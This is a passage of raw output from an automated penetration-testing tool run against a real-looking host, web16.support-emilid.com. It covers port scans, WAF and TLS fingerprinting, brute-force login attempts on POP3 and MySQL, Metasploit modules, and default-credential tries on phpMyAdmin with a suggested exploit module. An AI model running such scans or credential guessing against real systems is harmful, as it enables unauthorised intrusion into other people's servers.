4446Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:15 EST
4447Nmap scan report for web16.support-emilid.com (111.90.145.39)
4448Host is up (0.38s latency).
4449
4450PORT STATE SERVICE VERSION
445153/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
4452|_dns-fuzz: Server didn't response to our probe, can't fuzz
4453| dns-nsec-enum:
4454|_ No NSEC records found
4455| dns-nsec3-enum:
4456|_ DNSSEC NSEC3 not supported
4457| dns-nsid:
4458|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
4459Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4460Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.5 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
4461No exact OS matches for host (test conditions non-ideal).
4462Network Distance: 26 hops
4463Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
4464
4465Host script results:
4466| dns-blacklist:
4467| SPAM
4468|_ l2.apews.org - SPAM
4469| dns-brute:
4470|_ DNS Brute-force hostnames: No results.
4471
4472TRACEROUTE (using port 53/tcp)
4473HOP RTT ADDRESS
44741 129.82 ms 10.203.15.1
44752 ...
44763 130.44 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
44774 133.84 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
44785 134.91 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
44796 153.85 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
44807 166.74 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
44818 252.39 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
44829 260.74 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
448310 257.00 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
448411 253.75 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
448512 268.39 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
448613 275.37 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
448714 297.17 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
448815 301.95 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
448916 311.40 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
449017 318.10 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
449118 316.71 ms 38.104.210.82
449219 483.38 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
449320 478.38 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
449421 479.77 ms 61.11.210.114
449522 481.79 ms 124.158.230.70
449623 486.17 ms 111.90.128.46
449724 483.38 ms 172.16.16.2
449825 487.39 ms 172.16.16.2
449926 481.79 ms web16.support-emilid.com (111.90.145.39)
4500
4501OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4502Nmap done: 1 IP address (1 host up) scanned in 34.78 seconds
4503 + -- --=[Port 67 closed... skipping.
4504 + -- --=[Port 68 opened... running tests...
4505=======================================
4506 RUNNING NMAP PORT 68 SCRIPTS
4507=======================================
4508Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:16 EST
4509Nmap scan report for web16.support-emilid.com (111.90.145.39)
4510Host is up (0.36s latency).
4511
4512PORT STATE SERVICE VERSION
451368/tcp closed dhcpc
451468/udp closed dhcpc
4515Too many fingerprints match this host to give specific OS details
4516Network Distance: 25 hops
4517
4518TRACEROUTE (using port 68/tcp)
4519HOP RTT ADDRESS
45201 130.41 ms 10.203.15.1
45212 ...
45223 133.30 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
45234 129.37 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
45245 134.96 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
45256 155.08 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
45267 168.41 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
45278 258.54 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
45289 255.15 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
452910 258.59 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169)
453011 258.16 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
453112 254.49 ms be3084.ccr42.dca01.atlas.cogentco.com (154.54.30.65)
453213 278.18 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
453314 293.42 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
453415 302.27 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
453516 314.61 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
453617 316.95 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
453718 317.96 ms 38.104.210.82
453819 481.98 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
453920 486.41 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
454021 482.21 ms 61.11.210.114
454122 483.50 ms 61.11.210.114
454223 483.44 ms 124.158.230.70
454324 485.02 ms 172.16.16.2
454425 483.86 ms web16.support-emilid.com (111.90.145.39)
4545
4546OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4547Nmap done: 1 IP address (1 host up) scanned in 12.08 seconds
4548 + -- --=[Port 69 closed... skipping.
4549 + -- --=[Port 79 closed... skipping.
4550 + -- --=[Port 80 opened... running tests...
4551=======================================
4552 CHECKING FOR WAF
4553=======================================
4554
4555 ______
4556 / \
4557 ( W00f! )
4558 \ ____/
4559 ,, __ 404 Hack Not Found
4560 |`-.__ / / __ __
4561 /" _/ /_/ \ \ / /
4562 *===* / \ \_/ / 405 Not Allowed
4563 / )__// \ /
4564 /| / /---` 403 Forbidden
4565 \\/` \ | / _ \
4566 `\ /_\\_ 502 Bad Gateway / / \ \ 500 Internal Error
4567 `_____``-` /_/ \_\
4568
4569 ~ WAFW00F : v2.1.0 ~
4570 The Web Application Firewall Fingerprinting Toolkit
4571
4572[*] Checking http://111.90.145.39
4573[+] Generic Detection results:
4574[-] No WAF detected by the generic detection
4575[~] Number of requests: 7
4576
4577=======================================
4578 GATHERING HTTP INFO
4579=======================================
4580http://111.90.145.39 [200 OK] Apache[2][Default], Country[MALAYSIA][MY], HTTPServer[Apache/2], IP[111.90.145.39]
4581=======================================
4582 GATHERING SERVER INFO
4583=======================================
4584
4585wig - WebApp Information Gatherer
4586
4587
4588Scanning http://111.90.145.39...
4589_________________ SITE INFO __________________
4590IP Title
4591111.90.145.39
4592
4593__________________ VERSION ___________________
4594Name Versions Type
4595Roundcube CMS
4596Apache 2 Platform
4597PHP 7.2.18 Platform
4598
4599______________________________________________
4600Time: 49.4 sec Urls: 383 Fingerprints: 40401
4601=======================================
4602 CHECKING HTTP HEADERS
4603=======================================
4604HTTP/1.1 200 OK
4605Date: Sat, 29 Feb 2020 07:13:27 GMT
4606Server: Apache/2
4607Last-Modified: Fri, 03 May 2019 09:49:26 GMT
4608ETag: "2c-587f8aa8fdb43"
4609Accept-Ranges: bytes
4610Content-Length: 44
4611Vary: User-Agent
4612Content-Type: text/html
4613
4614HTTP/1.1 200 OK
4615Date: Sat, 29 Feb 2020 07:13:28 GMT
4616Server: Apache/2
4617Last-Modified: Fri, 03 May 2019 09:49:26 GMT
4618ETag: "2c-587f8aa8fdb43"
4619Accept-Ranges: bytes
4620Content-Length: 44
4621Vary: User-Agent
4622Content-Type: text/html
4623
4624=======================================
4625 GATHERING WEB FINGERPRINT
4626=======================================
4627 Apache 2
4628=======================================
4629 DISPLAYING META GENERATOR TAGS
4630=======================================
4631=======================================
4632 DISPLAYING COMMENTS
4633=======================================
4634=======================================
4635 DISPLAYING SITE LINKS
4636=======================================
4637=======================================
4638 SAVING SCREENSHOTS
4639=======================================
4640[+] Screenshot saved to /usr/share/knock/loot//screenshots/111.90.145.39-port80.jpg
4641modes/normal.sh: ligne 412 : [: == : opérateur unaire attendu
4642 + -- --=[Port 110 opened... running tests...
4643=======================================
4644 RUNNING NMAP PORT 110 SCRIPTS
4645=======================================
4646Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:17 EST
4647NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
4648NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
4649NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
4650Nmap scan report for web16.support-emilid.com (111.90.145.39)
4651Host is up (0.49s latency).
4652
4653PORT STATE SERVICE VERSION
4654110/tcp open pop3 Dovecot DirectAdmin pop3d
4655| pop3-brute:
4656| Accounts: No valid accounts found
4657|_ Statistics: Performed 205 guesses in 196 seconds, average tps: 0.9
4658|_pop3-capabilities: AUTH-RESP-CODE CAPA PIPELINING TOP UIDL USER RESP-CODES SASL(PLAIN) STLS
4659Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4660Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.11 (94%), Linux 3.5 (94%), Linux 3.1 (94%)
4661No exact OS matches for host (test conditions non-ideal).
4662Network Distance: 25 hops
4663
4664TRACEROUTE (using port 110/tcp)
4665HOP RTT ADDRESS
46661 131.73 ms 10.203.15.1
46672 ...
46683 131.29 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
46694 131.32 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
46705 135.02 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
46716 157.41 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
46727 166.61 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
46738 251.15 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
46749 257.97 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
467510 254.23 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
467611 254.29 ms be2807.ccr42.dca01.atlas.cogentco.com (154.54.40.110)
467712 265.06 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
467813 268.06 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
467914 290.63 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
468015 297.95 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
468116 313.94 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
468217 314.98 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
468318 313.31 ms 38.104.210.82
468419 477.57 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
468520 481.94 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
468621 477.76 ms 61.11.210.114
468722 481.95 ms 61.11.210.114
468823 481.38 ms 124.158.230.70
468924 487.39 ms 172.16.16.2
469025 486.42 ms web16.support-emilid.com (111.90.145.39)
4691
4692OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4693Nmap done: 1 IP address (1 host up) scanned in 216.85 seconds
4694 + -- --=[Port 111 opened... running tests...
4695=======================================
4696 RUNNING METASPLOIT MODULES
4697=======================================
4698RHOSTS => 111.90.145.39
4699[*] 111.90.145.39:111 - Scanned 1 of 1 hosts (100% complete)
4700[*] Auxiliary module execution completed
4701=======================================
4702 RUNNING SHOW MOUNT
4703=======================================
4704clnt_create: RPC: Program not registered
4705clnt_create: RPC: Program not registered
4706clnt_create: RPC: Program not registered
4707 + -- --=[Port 123 closed... skipping.
4708 + -- --=[Port 135 closed... skipping.
4709 + -- --=[Port 137 closed... skipping.
4710 + -- --=[Port 139 closed... skipping.
4711 + -- --=[Port 161 opened... running tests...
4712=======================================
4713 RUNNING NMAP PORT 161 SCRIPTS
4714=======================================
4715You specified more than one type of TCP scan. Please choose only one of -sA, -b, -sT, -sF, -sI, -sM, -sN, -sS, -sW, and -sX
4716QUITTING!
4717=======================================
4718 RUNNING METASPLOIT MODULES
4719=======================================
4720RHOSTS => 111.90.145.39
4721[-] Unknown error: Errno::ECONNREFUSED Connection refused - recvfrom(2)
4722[*] Scanned 1 of 1 hosts (100% complete)
4723[*] Auxiliary module execution completed
4724 + -- --=[Port 162 closed... skipping.
4725 + -- --=[Port 389 closed... skipping.
4726 + -- --=[Port 443 opened... running tests...
4727=======================================
4728 CHECKING FOR WAF
4729=======================================
4730
4731 ______
4732 / \
4733 ( Woof! )
4734 \ ____/ )
4735 ,, ) (_
4736 .-. - _______ ( |__|
4737 ()``; |==|_______) .)|__|
4738 / (' /|\ ( |__|
4739 ( / ) / | \ . |__|
4740 \(_)_)) / | \ |__|
4741
4742 ~ WAFW00F : v2.1.0 ~
4743 The Web Application Firewall Fingerprinting Toolkit
4744
4745[*] Checking https://111.90.145.39/
4746[+] Generic Detection results:
4747[-] No WAF detected by the generic detection
4748[~] Number of requests: 7
4749
4750=======================================
4751 GATHERING HTTP INFO
4752=======================================
4753https://111.90.145.39/ [200 OK] Apache[2][Default], Country[MALAYSIA][MY], HTTPServer[Apache/2], IP[111.90.145.39]
4754=======================================
4755 GATHERING SERVER INFO
4756=======================================
4757
4758wig - WebApp Information Gatherer
4759
4760
4761=======================================
4762 CHECKING HTTP HEADERS
4763=======================================
4764=======================================
4765 GATHERING WEB FINGERPRINT
4766=======================================
4767 Apache 2
4768=======================================
4769 DISPLAYING META GENERATOR TAGS
4770=======================================
4771=======================================
4772 DISPLAYING COMMENTS
4773=======================================
4774=======================================
4775 DISPLAYING SITE LINKS
4776=======================================
4777=======================================
4778 GATHERING SSL/TLS INFO
4779=======================================
4780Version: 1.11.13-static
4781OpenSSL 1.0.2-chacha (1.0.2g-dev)
4782
4783Connected to 111.90.145.39
4784
4785Testing SSL server 111.90.145.39 on port 443 using SNI name 111.90.145.39
4786
4787 TLS Fallback SCSV:
4788Server supports TLS Fallback SCSV
4789
4790 TLS renegotiation:
4791Session renegotiation not supported
4792
4793 TLS Compression:
4794Compression disabled
4795
4796 Heartbleed:
4797TLS 1.2 not vulnerable to heartbleed
4798TLS 1.1 not vulnerable to heartbleed
4799TLS 1.0 not vulnerable to heartbleed
4800
4801 Supported Server Cipher(s):
4802Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
4803Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
4804Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
4805Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
4806Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
4807Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
4808Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
4809Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
4810Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
4811Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
4812Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
4813Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
4814Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
4815Accepted TLSv1.2 128 bits AES128-GCM-SHA256
4816Accepted TLSv1.2 256 bits AES256-GCM-SHA384
4817Accepted TLSv1.2 128 bits AES128-SHA256
4818Accepted TLSv1.2 256 bits AES256-SHA256
4819Accepted TLSv1.2 128 bits AES128-SHA
4820Accepted TLSv1.2 256 bits AES256-SHA
4821Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
4822Accepted TLSv1.2 256 bits CAMELLIA256-SHA
4823Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
4824Accepted TLSv1.2 128 bits CAMELLIA128-SHA
4825Accepted TLSv1.2 112 bits DES-CBC3-SHA
4826Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
4827Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
4828Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
4829Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
4830Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
4831Accepted TLSv1.1 128 bits AES128-SHA
4832Accepted TLSv1.1 256 bits AES256-SHA
4833Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
4834Accepted TLSv1.1 256 bits CAMELLIA256-SHA
4835Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
4836Accepted TLSv1.1 128 bits CAMELLIA128-SHA
4837Accepted TLSv1.1 112 bits DES-CBC3-SHA
4838
4839 SSL Certificate:
4840Signature Algorithm: sha1WithRSAEncryption
4841RSA Key Strength: 2048
4842
4843Subject: localhost
4844Issuer: localhost
4845
4846Not valid before: May 3 09:49:26 2019 GMT
4847Not valid after: Sep 17 09:49:26 2046 GMT
4848
4849=======================================
4850 SAVING SCREENSHOTS
4851=======================================
4852modes/normal.sh: ligne 675 : [: == : opérateur unaire attendu
4853[+] Screenshot saved to /usr/share/knock/loot//screenshots/111.90.145.39-port443.jpg
4854 + -- --=[Port 445 closed... skipping.
4855 + -- --=[Port 512 closed... skipping.
4856 + -- --=[Port 513 closed... skipping.
4857 + -- --=[Port 514 closed... skipping.
4858 + -- --=[Port 1099 closed... skipping.
4859 + -- --=[Port 1433 closed... skipping.
4860 + -- --=[Port 2049 closed... skipping.
4861 + -- --=[Port 3306 opened... running tests...
4862=======================================
4863 RUNNING NMAP PORT 3306 SCRIPTS
4864=======================================
4865Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:23 EST
4866NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
4867NSE: [mysql-brute] usernames: Time limit 3m00s exceeded.
4868NSE: [mysql-brute] passwords: Time limit 3m00s exceeded.
4869Nmap scan report for web16.support-emilid.com (111.90.145.39)
4870Host is up (0.27s latency).
4871
4872PORT STATE SERVICE VERSION
48733306/tcp open mysql MySQL (unauthorized)
4874| mysql-brute:
4875| Accounts: No valid accounts found
4876|_ Statistics: Performed 3550 guesses in 180 seconds, average tps: 19.4
4877|_mysql-empty-password: Host '45.132.192.65' is not allowed to connect to this MySQL server
4878| mysql-enum:
4879| Accounts: No valid accounts found
4880|_ Statistics: Performed 10 guesses in 2 seconds, average tps: 5.0
4881|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
4882Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
4883Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.5 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
4884No exact OS matches for host (test conditions non-ideal).
4885Network Distance: 25 hops
4886
4887TRACEROUTE (using port 3306/tcp)
4888HOP RTT ADDRESS
48891 129.87 ms 10.203.15.1
48902 ...
48913 131.11 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
48924 131.45 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
48935 134.78 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
48946 162.44 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
48957 167.42 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
48968 252.79 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
48979 250.85 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
489810 246.32 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
489911 244.58 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
490012 258.10 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
490113 271.22 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
490214 275.14 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
490315 294.62 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
490416 314.95 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
490517 314.82 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
490618 314.86 ms 38.104.210.82
490719 480.49 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
490820 483.29 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
490921 486.14 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
491022 483.33 ms 124.158.230.70
491123 488.08 ms 111.90.128.46
491224 493.89 ms 172.16.16.2
491325 487.94 ms web16.support-emilid.com (111.90.145.39)
4914
4915OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4916Nmap done: 1 IP address (1 host up) scanned in 201.70 seconds
4917=======================================
4918 RUNNING METASPLOIT MODULES
4919=======================================
4920RHOSTS => 111.90.145.39
4921[*] 111.90.145.39: - Scanned 1 of 1 hosts (100% complete)
4922[*] Auxiliary module execution completed
4923 + -- --=[Port 3310 closed... skipping.
4924 + -- --=[Port 3128 closed... skipping.
4925 + -- --=[Port 3389 closed... skipping.
4926 + -- --=[Port 3632 closed... skipping.
4927 + -- --=[Port 5432 closed... skipping.
4928 + -- --=[Port 5555 closed... skipping.
4929 + -- --=[Port 5800 closed... skipping.
4930 + -- --=[Port 5900 closed... skipping.
4931 + -- --=[Port 5984 closed... skipping.
4932 + -- --=[Port 6000 closed... skipping.
4933 + -- --=[Port 6667 closed... skipping.
4934 + -- --=[Port 7001 closed... skipping.
4935 + -- --=[Port 10000 closed... skipping.
4936 + -- --=[Port 16992 closed... skipping.
4937 + -- --=[Port 27017 closed... skipping.
4938 + -- --=[Port 27018 closed... skipping.
4939 + -- --=[Port 27019 closed... skipping.
4940 + -- --=[Port 28017 closed... skipping.
4941=======================================
4942 SCANNING FOR COMMON VULNERABILITIES
4943=======================================
4944modes/normal.sh: ligne 1167 : [: == : opérateur unaire attendu
4945#########################################################################################
4946 oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
4947 `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
4948 `888. .8' .88888. Y88bo. 888 8 888 888
4949 `888.8' .8' `888. `ZY8888o. 888 8 888 888
4950 `888' .88ooo8888. `0Y88b 888 8 888 888
4951 888 .8' `888. oo .d8P `88. .8' `88b d88'
4952 o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
4953Welcome to Yasuo v2.3
4954Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
4955#########################################################################################
4956
4957I, [2020-02-29T02:27:03.427603 #649481] INFO -- : Initiating port scan
4958I, [2020-02-29T02:28:01.106805 #649481] INFO -- : Using nmap scan output file logs/nmap_output_2020-02-29_02-27-03.xml
4959I, [2020-02-29T02:28:01.108056 #649481] INFO -- : Discovered open port: 111.90.145.39:80
4960I, [2020-02-29T02:28:03.063682 #649481] INFO -- : Discovered open port: 111.90.145.39:443
4961I, [2020-02-29T02:28:07.030007 #649481] INFO -- : Discovered open port: 111.90.145.39:465
4962I, [2020-02-29T02:28:10.108961 #649481] INFO -- : Discovered open port: 111.90.145.39:993
4963I, [2020-02-29T02:28:14.108630 #649481] INFO -- : Discovered open port: 111.90.145.39:995
4964I, [2020-02-29T02:28:18.138709 #649481] INFO -- : Discovered open port: 111.90.145.39:2222
4965I, [2020-02-29T02:28:20.110764 #649481] INFO -- : <<<Enumerating vulnerable applications>>>
4966[+] Yasuo found phpMyAdmin at https://111.90.145.39:443/phpmyadmin/. Requires HTTP basic auth
4967I, [2020-02-29T02:29:45.439506 #649481] INFO -- : Initiating login bruteforce, hold on tight...
4968[+] Trying app-specific default creds first -> admin:admin
4969
4970Could not find default credentials, sucks
4971
4972
4973--------------------------------------------------------
4974<<<Yasuo discovered following vulnerable applications>>>
4975--------------------------------------------------------
4976+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
4977| App Name | URL to Application | Potential Exploit | Username | Password |
4978+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
4979| phpMyAdmin | https://111.90.145.39:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
4980+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
4981=======================================
4982 RUNNING FULL PORT SCAN
4983=======================================
4984Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:32 EST
4985Warning: 111.90.145.39 giving up on port because retransmission cap hit (2).
4986Nmap scan report for web16.support-emilid.com (111.90.145.39)
4987Host is up (0.49s latency).
4988Skipping host web16.support-emilid.com (111.90.145.39) due to host timeout
4989OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
4990Nmap done: 1 IP address (1 host up) scanned in 906.34 seconds
4991=======================================
4992 PERFORMING UDP PORT SCAN
4993=======================================
4994Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:47 EST
4995Nmap scan report for web16.support-emilid.com (111.90.145.39)
4996Host is up (0.33s latency).
4997
4998PORT STATE SERVICE VERSION
499953/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
500067/tcp closed dhcps
500168/tcp closed dhcpc
500269/tcp closed tftp
500388/tcp closed kerberos-sec
5004123/tcp closed ntp
5005137/tcp closed netbios-ns
5006138/tcp closed netbios-dgm
5007139/tcp filtered netbios-ssn
5008161/tcp closed snmp
5009162/tcp closed snmptrap
5010389/tcp closed ldap
5011520/tcp closed efs
50122049/tcp closed nfs
501353/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
5014| dns-nsid:
5015|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
501667/udp closed dhcps
501768/udp open|filtered dhcpc
501869/udp open|filtered tftp
501988/udp closed kerberos-sec
5020123/udp closed ntp
5021137/udp open|filtered netbios-ns
5022138/udp open|filtered netbios-dgm
5023139/udp closed netbios-ssn
5024161/udp open|filtered snmp
5025162/udp closed snmptrap
5026389/udp open|filtered ldap
5027520/udp closed route
50282049/udp closed nfs
5029Device type: general purpose|storage-misc|WAP|broadband router|router|media device|webcam
5030Running (JUST GUESSING): Linux 2.6.X|3.X (95%), HP embedded (93%), MikroTik RouterOS 6.X (91%), Infomir embedded (91%), Ubiquiti AirOS 5.X (91%)
5031OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:mikrotik:routeros:6.19 cpe:/h:infomir:mag-250 cpe:/o:ubnt:airos:5.5.9 cpe:/o:linux:linux_kernel:2.6.17
5032Aggressive OS guesses: Linux 2.6.32 - 3.1 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), HP P2000 G3 NAS device (93%), Linux 3.2 (93%), Linux 3.11 (93%), Linux 2.6.32 - 3.10 (92%)
5033No exact OS matches for host (test conditions non-ideal).
5034Network Distance: 25 hops
5035Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
5036
5037TRACEROUTE (using port 2049/tcp)
5038HOP RTT ADDRESS
50391 129.71 ms 10.203.15.1
50402 ...
50413 130.94 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
50424 129.95 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
50435 135.71 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
50446 154.51 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
50457 159.26 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
50468 248.70 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
50479 246.53 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
504810 246.09 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
504911 249.07 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
505012 261.08 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
505113 275.46 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
505214 289.90 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
505315 294.09 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
